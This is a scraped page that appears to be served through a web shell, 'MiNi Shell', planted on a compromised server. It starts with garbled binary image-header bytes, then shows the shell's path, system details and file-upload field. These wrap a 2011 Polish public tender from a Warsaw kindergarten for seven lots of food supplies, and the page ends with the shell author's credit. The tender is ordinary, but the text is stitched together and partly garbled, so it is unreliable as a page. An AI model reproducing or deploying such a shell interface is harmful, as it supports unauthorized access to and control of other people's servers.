JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111209/325773-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 7 pakietów</b><br>
<b>Numer ogłoszenia: 325773 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Nr 13 , ul. Schillera 6a, 00-248 Warszawa, woj. mazowieckie, tel. 22 8317497, faks 22 8317497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkole13.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 7 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 7 pakietów, zgodnie ze SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.51.00.00-6, 03.22.00.00-9, 15.10.00.00-9, 15.80.00.00-6, 15.89.60.00-5, 41.11.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole13.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSZKOLE Nr 13
ul. Schillera 6 a
00-248 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 10:00, miejsce: PRZEDSZKOLE Nr 13
ul. Schillera 6 a
00-248 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, WYROBY PIEKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały baltonowski 0,5kg	szt.	1150,
Chleb staropolski 650g	szt.	450,
Bułka wrocławska krojona 300g	szt.	1338,
Bułka tarta 0,5 kg	szt.	105,
Bułki drożdżówki małe 45g	szt.	420,
Bułki drożdżówki duże 110g	szt	325,
pączki	szt	280,
Babeczki z serem	szt	190.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko w kartonie 1l UHT typu Łaciate lub równoważne 3,2%	szt.	4025,
Masło extra 82% tłuszczu
Typu łaciate lub równoważne	szt.	1470,
Śmietana 18% 400ml typu Piątnica lub równoważna	szt.	   850,
Ser żółty typu Gouda Edamski	kg	52,
Ser topiony 100g typu Hohland lub równoważny	szt.	325,
Margaryna mleczna 250g typu Kasia lub równoważna	szt	40,
Ser biały półtłusty typu Garwolin lub równoważny	kg	130,                 
Serek krem.- śmiet 1kg	kg	117,
Twaróg Pesident 500g 	szt	60,
Serek Typu Danio 140g lub
równoważny 	szt.	1350,
Serek typu Bakuś 100g lub równoważny	szt.	450,
Twarożek typu  Danonki 50g
lub równoważne	szt.	660,
Twarożek typu Danonki mega 80g lub równoważne	szt	660,
Jogurt pitny typu Actimel 100g lub równoważny	szt	850,
Budyń typu PAULA  100g lub równowazny	szt	850,
Puding typu ZOTT 125 g lub równowazny	szt.	850,
Jogurty owocowe 115g typu Finezja lub równowazny	szt	1004,
Jogurt owocowy typu Gratka 125g lub równoważny		1010,
Jogurt owocowy z musem 135g typu bakoma lub równoważny		1005,
Jogurt Fantazja typu Danon 106g lub równoważne	szt	850,
Jogurt naturalny 400g typu Danon lub równoważny	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA, OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg	700,
Brokuł	kg	50,
brukselka	kg	16,
Buraki ćwikłowe	kg	150,
Buraki młode botwina	szt	50,
Brzoskwinie/nektarynki	kg	40,
Cebula	kg	120,
cytryny	kg	3,
dynia	kg	10,
Fasola szparagowa	kg	30,
gruszki	kg	270,
jabłka	kg	900,
Kalafior świeży	szt.	80,
kapusta biała	kg	220,
Kapusta kiszona	kg	40,
Kapusta biała młoda	szt	65,
Kapusta włoska	kg	60,                   
Kapusta czerwona	szt	50,
koperek	szt	220,
Kapusta pekińska	kg	70,
kiwi	kg	700,
pomarańcze	kg	110,
mandarynki	kg	200,
maliny świeże  opakowanie	szt	45,
marchew	kg	770,
Marchew młoda w pęczkach	szt.	20,
morele	kg	 24,
Natka pietruszki	szt	250,
Ogórki kiszone	kg	110,
Ogórki małosolne	kg	9,
Ogórki świeże	kg	250,
Papryka świeża czerwona	kg	60,
pietruszka	kg	220,
Pomidory  świeże	kg	185,
pory	kg	20,
Rzodkiewka pęczki	szt	50,
Sałata zielona	szt	380,
seler	kg	223,
Szczypiorek/dymka	szt	60,
Śliwki węgierki	kg	164,
truskawki	kg	130,
Winogrona białe	kg	45,
Winogrona rodzynkowe	kg	45,
ziemniaki	kg	3520,
Ziemniaki młode	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cielęcina	kg	100,
Ćwiartki z kurczaka	kg	150,
Podudzie z kurczaka	kg	240,
Filet z indyka	kg	55,
Filet z kurczaka	kg	55,
Kurczaki całe	kg	55,
Łata wołowa	kg	80,
Pręga wołowa	kg	80,
szponder	kg	25,
Łopatka wp. bez kości	kg	350,
Szynka wp.  bez kości	kg	240,
Schab środkowy bez kości	kg	170,
Schab karkowy bez kości	kg	24,
Żeberka paski	kg	34,
Schab domowy pieczony	kg	25,
Szynka od zawsze	kg	25,
Szynka konserwowa	kg	20,
Polędwica sopocka	kg	35,
Szynka biała	kg	35,
Kiełbasa szynkowa	kg	40,
Wędlina drobiowa typu 
Szynka z piersi indyczej, szynka z piersi kurcząt	kg	48,
Pasztet z pieca	kg	30,
Szynka wiejska	kg	50,
Parówki delikatesowe	kg	150,
Smalec 200g	szt	45,
słonina	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRODUKTY POZOSTAŁE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz biały  49 lub 51 gr
Typu Winiary lub równoważny	szt	194,
Brzoskwinia w puszce	szt.	40,
Ananas w puszce	szt.	40,
cukier	kg	       540,
Cukier puder	kg	         5,
Cukier waniliowy 32g	szt.	70,
Czekolada 200g typu Wedel lub równoważna	szt	100,
Drożdże  100g	szt.	70,
Dżem 300g	szt.	45,
Fasola sucha 0,5kg	szt	20,
Groch łuskany 0,5kg	szt	25,
Galaretka  75g	szt.	16,
Groszek konserwowy  400g
Typu Bonduelle lub równoważny	szt.	70,
Herbata owocowa  20 torebek w opakowaniu	szt.	190,
Herbata cytrynowa 25 torebek w opakowaniu	szt.	20,
Herbata naturalna typu Lipton lub równoważna	szt.	            25,
jajka	szt	      4500,
Kakao  100g	szt	47,
Kasza jęczmienna  0,9 kg	szt.	          88,
Kawa zbożowa inka 150g	szt.	86,
Ketchup 48 g typu Pudliszki lub równoważny	szt.	82,
Koncentrat pomidorowy 410g typu Gusto Prrimo lub równoważny	kg	115,
Krem czekoladowy 400g typu Nutella lub równoważny	szt	60,
Kukurydza w puszce 400g
Typu Bonduelle lub równoważna	szt.	44,
Kwasek cytrynowy 20g	szt.	50,
Majonez 700g typu Winiary lub równoważny	szt.	50,
Makaron 500g typu Lubella lub równoważny	szt.	300,
Mąka typu Szymanowska lub równoważna	kg	400,
Mąka ziemniaczana
kg	50,
Miód pszczeli wielokwiatowy 400g	szt	6,
Zając czekoladowy 60g	szt	90,
Mikołaj czekoladowy 60g	szt	90,
Olej  1l typu Kujawski lub równoważny	l	250,
Płatki kukurydziane 250g typu Nestle lub równoważne	szt.	856,
Pomidory w puszce bez skóry 400g	szt.	40,
Proszek do pieczenia 	szt.	30,
Koncentrat barszczu czerwonego 330g typu krakus lub równoważny	szt.	20,
Pieprz naturalny czarny mielony	szt.	80,
Liśc laurowy	szt.	100,
Majeranek 	szt.	20,
Papryka słodka	szt.	20,
Rodzynki 	kg	6,
Ryż typu Halina lub równ.	kg	65,
Sos do spaghetti 520g typu ŁOWICZ lub równoważny	szt.	160,
Soczek owocowy 100% 
 0,2 l typu Tymbark lub równoważny	szt	      3000,
Soczek owocowy 0,3l typu Kubuś Go lub równoważny	Szt.	1800,
Sól 1kg	kg	125,
Wafelki 28g typu Grześki lub równoważny	szt	1250,
Kanapka mleczna 28g typu Kinder  lub równoważna	szt	1250,
Batoniki typu Mini cinis 28g	szt.	1250,
Wegeta 200g typu Podravka lub równoważna	szt.	135,
Woda mineralna 0,5l	szt	400,
Zapach do ciasta typu Libella lub równoważny	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fasolka szparagowa mrożona	szt	             90,
Kalafior mrożony	szt.	              90,
Mieszanka kompotowa mrożona	szt.	             624,
Bukiet warzyw	szt.	             140,
Truskawka mrożona	szt.	              98,
Wiśnia mrożona	szt	             10,
Malina mrożona	szt	              12,
Makrela wędzona	kg	              25,
Ryby : mintaj 	kg	              36,
Grenadier	kg	             34,
Dorsz	kg	             30,
Sola	kg	            50,
tilapia	kg	9,
Paluszki rybne typu Frosta lub równoważne	szt	180,
Tilapia	kg	            20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda 18,9l	szt	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com